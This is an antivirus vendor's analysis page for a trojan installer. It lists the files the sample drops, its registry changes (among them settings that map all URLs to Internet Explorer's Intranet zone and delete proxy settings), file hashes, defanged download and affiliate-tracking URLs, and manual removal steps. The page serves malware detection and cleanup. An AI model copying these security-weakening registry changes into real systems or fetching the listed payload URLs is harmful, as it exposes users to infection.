Trojan.Generic.11944172_e024fb5336 – Adaware

Dynamic Analysis

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

%original file name%.exe:1764
cpSetup.exe:260

The Trojan injects its code into the following process(es):

Setup__2140_il65.exe:1408

Mutexes

The following mutexes were created/opened:No objects were found.

File activity

The process %original file name%.exe:1764 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh1.tmp (0 bytes)

The process cpSetup.exe:260 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (0 bytes)

The process Setup__2140_il65.exe:1408 makes changes in the file system.

The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)

Registry activity

The process %original file name%.exe:1764 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "89 34 9F 92 08 48 FF C4 82 27 05 E5 98 EB 9F 91"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process cpSetup.exe:260 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "45 32 2B D7 B6 4F 61 2A 0B C8 33 1C 3E 03 10 E3"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The process Setup__2140_il65.exe:1408 makes changes in the system registry.

The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"Guid" = "8aefce96-4618-42ff-a057-3536aa78233e"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"EventMessageFile" = "%System%\ESENT.dll"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\0\win32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryCount" = "16"
"TypesSupported" = "7"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\HELPDIR]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\TypeLib]
"(Default)" = "{b5becdeb-e2ba-4f85-ae0b-37cb4d093da2}"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"Active" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"Active" = "1"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"(Default)" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\Version]
"(Default)" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"ControlFlags" = "1"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0]
"(Default)" = "InstallerLib"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg]
"LogSessionName" = "stdout"

[HKCR\TypeLib\{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}\1.0\FLAGS]
"(Default)" = "0"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level" = ""

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "Setup__2140_il65.exe"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\VersionIndependentProgID]
"(Default)" = "carpel.groveled"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil]
"ControlFlags" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}]
"(Default)" = "Inst Class"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"LogSessionName" = "stdout"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappcfg\traceIdentifier]
"Guid" = "5f31090b-d990-4e91-b16d-46121d0255aa"

[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1463087278"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"Version" = "1.0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\eappprxy]
"ControlFlags" = "1"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "53 18 1C 0C 4E A3 CF 5E 83 A6 05 CB 07 C9 14 AC"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\System\CurrentControlSet\Services\Eventlog\Application\ESENT]
"CategoryMessageFile" = "%System%\ESENT.dll"

[HKCR\carpel.groveled.1\CLSID]
"(Default)" = "{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\LocalServer32]
"ServerExecutable" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\Setup__2140_il65.exe"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Tracing\Microsoft\QUtil\traceIdentifier]
"BitNames" = " Error Unusual Info Debug"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCR\carpel.groveled\CurVer]
"(Default)" = "carpel.groveled.1"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}\TypeLib]
"(Default)" = "{B5BECDEB-E2BA-4F85-AE0B-37CB4D093DA2}"

[HKCR\Interface\{568DFAC8-3798-4783-8BB7-4D74717AC1CE}]
"(Default)" = "IBoot"

[HKCR\CLSID\{320195d8-a8c1-4b82-b50e-6e2fe7b25b99}\ProgID]
"(Default)" = "carpel.groveled.1"

[HKCR\carpel.groveled]
"(Default)" = "Inst Class"

[HKCR\carpel.groveled.1]
"(Default)" = "Inst Class"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\ESENT\Process\Setup__2140_il65\DEBUG]
"Trace Level"

Dropped PE files

MD5	File path
fae6dcd512e610217f19251ab65624fd	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\Setup__2140_il65.exe
a5f8399a743ab7f9c88c645c35b1ebb5	c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsh2.tmp\NSISdl.dll

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

Removals

Remove it with Ad-Aware

Click (here) to download and install Ad-Aware Free Antivirus.
Update the definition files.
Run a full scan of your computer.

Manual removal*

Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:1764
cpSetup.exe:260
Delete the original Trojan file.
Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe (31319 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt (630 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsh2.tmp\NSISdl.dll (14 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe (66356 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000ce9aa.a (77 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\000cf0ce.a (1709 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\footer_img[1].png (937 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\main[1].css (1177 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\finish[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\index[1].htm (7648 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\decline[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\next[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe:typelib (8 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\cancel[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\dm_left_image[1].png (3108 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\skip[1].gif (1 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\logo[1].png (3036 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\amipb[1].js (31329 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\cancel1[1].gif (2 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OPQNSD2J\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg (31 bytes)
%Documents and Settings%\%current user%\Desktop\Continue installation .lnk (848 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\WLMVCPYN\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\accept[1].gif (3 bytes)
Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

Static Analysis

VersionInfo

No information is available.

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
.text	4096	23628	24064	4.46394	856b32eb77dfd6fb67f21d6543272da5
.rdata	28672	4764	5120	3.4982	dc77f8a1e6985a4361c55642680ddb4f
.data	36864	154712	1024	3.3278	7922d4ce117d7d5b3ac2cffe4b0b5e4f
.ndata	192512	57344	0	0	d41d8cd98f00b204e9800998ecf8427e
.rsrc	249856	2536	2560	3.13928	7e17f704d3bfebc09c619c31ae04b106

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 76
1f80adc186d38569a7f12b37bfb110ae
d75f64a4fc6e1e630f3a51c92ad3c93f
879651a405ee0a51e41803ce9bcb4634
7cbf36c08b44adbda84a760fcb3d5bd5
95259d62d096d69e6c71124d76d2742e
4251897fc31de2b714ccd3c165ed3c22
b958be3153aacfa25cceea183ef7dd3e
891f61a5480eeb26ce51a0fd77355991
6ebad71edda218ef8102afe3432bc334
0ad1ef2f250441d9ae9594b8793c569f
faa24adbd70ff86f783e1419d2115763
723ccdfe9da6d78a751fe606dea351aa
93711c4ab5b6416877a200c6f1a26f70
8eef73e34ed320b0a121902ac1d3ab50
21b13c0e699f2e1a2fc63088e1de4dc1
28cb970d9a603307bbfce338e45bd285
3392bcf5c59acc67d5817989b6ac74bd
4f67278caf52bca6a599c78fd5751400
feb6e129679225efba86b059cca01931
8b6484933de890c4d13e0ffa534de649
defe46a11799c224eb650f9e362aea5d
4270445c87bd8d346291d62413ed0740
5a2b6322d2b8d9a7df6bb0a489d5dae9
2634dc3da87a016d964fbdf1f33bd999
e6333d8fd797d71aae7b43f8c5206cda

Network Activity

URLs

URL	IP
hxxp://46.21.100.248/launch_v2.php?p=sevenzip&pid=145&tid=438526&sid=7
hxxp://d24txo22v2kbr3.cloudfront.net/?affId=1006&appTitle=Installation&s1=145&s2=438526&setupName=cpSetup&appVersion=2.92&instId=11
hxxp://up.freeo9.space/h_redir.php?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://capital.go2cloud.org/aff_c?offer_id=4&aff_id=1006&source=11&aff_sub=145&aff_sub2=438526&aff_sub3=0&aff_sub4=0&aff_sub5=0&url=http://up.freeo9.space/offer.php?affId={aff_id}&trackingId=45486395&instId=11&ho_trackingid={transaction_id}&cc={country_code}&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.16.169.88
hxxp://up.freeo9.space/offer.php?affId=1006&trackingId=45486395&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&cc=UA&cc_typ=ho&sb=x86&wv=xpsp3&db=InternetExplorer&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://set.downor3.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	54.88.21.193
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/index.php
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css
hxxp://dyno3mlj15jgv.cloudfront.net/V35/amipb.js
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/footer_img.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/decline.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/skip.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/next.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/accept.gif
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/finish.gif
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/finalize.php
hxxp://dualstack.ils-front-balancer3-264552681.us-east-1.elb.amazonaws/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png
hxxp://d3a3s75zr23wnc.cloudfront.net/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/dm_left_image.png
hxxp://www.secularistsarakolet.site/index.php	54.83.41.157
hxxp://www.secularistsarakolet.site/finalize.php	54.83.41.157
hxxp://up.freeo9.spacehxxp://up.freeo9.space/installer.php?affId=1006&instId=11&ho_trackingid=102524c8b7d471e3251121f5c3cd0e&trackingId=45486395&cc=UA&uac=1&cid=707569c4c57c87d53171d83f71777ffd&v=1	52.85.173.161
hxxp://www.secularistsarakolet.site/Html/7d0e2798-c9e5-442a-a48d-1a3dfc747868/logo.png	54.83.41.157
hxxp://www.dosecuretrips.com/download.php?version=1.1.5.26&monitor=1&z2=0&ci=2140&appsetupurl=http://pe-sixi.com/downloadS.php?bu=am&prefix=Setup&instid[appname]=installer&instid[cmdline]=/S&instid[appimageurl]=http://pe-sixi.com/img/icon_installer.png	54.83.41.157
hxxp://cdn1.downloadcrest.com/V35/amipb.js	52.85.173.7
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/main.css	52.85.173.111
hxxp://cdn2.downloadcrest.com/9ee1efd2-b9b2-403f-8f9a-5fc856fa00a3/cancel1.gif	52.85.173.111
